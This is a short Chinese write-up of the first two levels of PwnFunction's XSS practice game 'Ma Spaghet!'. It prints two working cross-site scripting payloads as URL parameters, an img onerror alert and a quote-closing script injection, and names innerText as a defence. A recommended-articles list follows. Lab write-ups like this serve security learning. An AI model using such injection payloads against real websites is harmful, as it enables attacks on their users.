一、环境
XSS Game - Ma Spaghet! | PwnFunction
二、开始闯关
第一关
看看代码
试一下直接写
明显进来了为什么不执行看看官方文档吧
你不执行那我就更改单标签去使用呗
?somebody=<img%20src=1%20onerror="alert(1)">
防御:
innerText
第二关
看看源码:
考察一个基础的闭合
?jeff=1";alert(1)//
后续待更新
xss高级靶场
凌晨五点的星2024-03-02 9:13
相关推荐
掘金一周3 分钟前
金石焕新程 >> 瓜分万元现金大奖征文活动即将回归 | 掘金一周 4.3三翼鸟数字化技术团队21 分钟前
Vue自定义指令最佳实践教程Jasmin Tin Wei1 小时前
蓝桥杯 web 学海无涯(axios、ecahrts)版本二圈圈编码1 小时前
Spring Task 定时任务转转技术团队1 小时前
代码变更暗藏危机?代码影响范围分析为你保驾护航Mintopia1 小时前
Node.js高级实战:自定义流与Pipeline的高效数据处理 ——从字母生成器到文件管道的深度解析Mintopia1 小时前
Three.js深度解析:InstancedBufferGeometry实现动态星空特效 ——高效渲染十万粒子的底层奥秘北凉温华1 小时前
强大的 Vue 标签输入组件:基于 Element Plus 的 ElTagInput 详解原生高钙1 小时前
LLM大模型对话框实践:大文件的分片上传加兵柠檬水1 小时前
代码输出题,会这些就够了。